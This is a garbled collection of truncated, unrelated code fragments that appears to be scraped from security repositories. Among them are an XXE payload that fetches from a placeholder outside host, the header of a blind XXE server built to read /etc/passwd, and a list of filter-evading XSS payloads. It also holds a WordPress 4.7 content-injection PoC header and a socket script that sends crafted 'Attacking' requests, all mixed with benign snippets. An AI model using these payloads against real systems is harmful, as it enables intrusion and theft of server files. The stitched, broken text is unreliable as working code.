--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>

#!/usr/bin/python
#
# Simple Blind XXE server intended to handle incoming requests for
# malicious DTD file, that will subsequently ask for locally stored file,
# like file:///etc/passwd.
#
# This program has been tested with PlayFramework 2.1.3 XXE vulnerability,
# to be run as follows:
#

<script\x20type="text/javascript">javascript:alert(1);</script>
<script\x3Etype="text/javascript">javascript:alert(1);</script>
<script\x0Dtype="text/javascript">javascript:alert(1);</script>
<script\x09type="text/javascript">javascript:alert(1);</script>
<script\x0Ctype="text/javascript">javascript:alert(1);</script>
<script\x2Ftype="text/javascript">javascript:alert(1);</script>
<script\x0Atype="text/javascript">javascript:alert(1);</script>
'`"><\x3Cscript>javascript:alert(1)</script>
'`"><\x00script>javascript:alert(1)</script>
<img src=1 href=1 onerror="javascript:alert(1)"></img>

from hashlib import md5
from base64 import b64decode
from base64 import b64encode
from Crypto import Random
from Crypto.Cipher import AES

# Padding for the input string -- not
# related to encryption itself.
BLOCK_SIZE = 16  # Bytes

#!/usr/bin/env python -S
# -*- coding: utf-8 -*-
import sys
import re
import xml.sax
import io        # for 2.6
import StringIO  # for 3.0
#
# ** If your Python is 2.x and the XML encoding is UTF-8, set the following.

# 2017 - @leonjza
#
# Wordpress 4.7.0/4.7.1 Unauthenticated Content Injection PoC
# Full bug description: https://blog.sucuri.net/2017/02/content-injection-vulnerability-wordpress-rest-api.html
# Usage example:
#
# List available posts:
#
# $ python inject.py http://localhost:8070/

#!/usr/bin/env python
def split_into_groups(iterable, group_size):
    """Split an iterable collection into groups with fixed size.

    Yield
    -----
    list[any]
        Groups of elements.
    """

#! /usr/bin/perl
#
# based on https://stackoverflow.com/a/87531/5742651
# usage: sqlite3 .dump database_name.sqlite3 | perl sqlite2mysql.pl | mysql -u root -p $import_database_name
#
# ignore the following lines:
#   BEGIN TRANSACTION
#   COMMIT
#   sqlite_sequence
#   CREATE UNIQUE INDEX

import socket, sys, os

print "][ Attacking " + sys.argv[1] + " ... ]["
print "injecting " + sys.argv[2]

def attack():
    #pid = os.fork()
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((sys.argv[1], 80))
    print ">> GET /" + sys.argv[2] + " HTTP/1.1"
    s.send("GET /" + sys.argv[2] + " HTTP/1.1\r\n")
    s.send("Host: " + sys.argv[1] + "\r\n\r\n")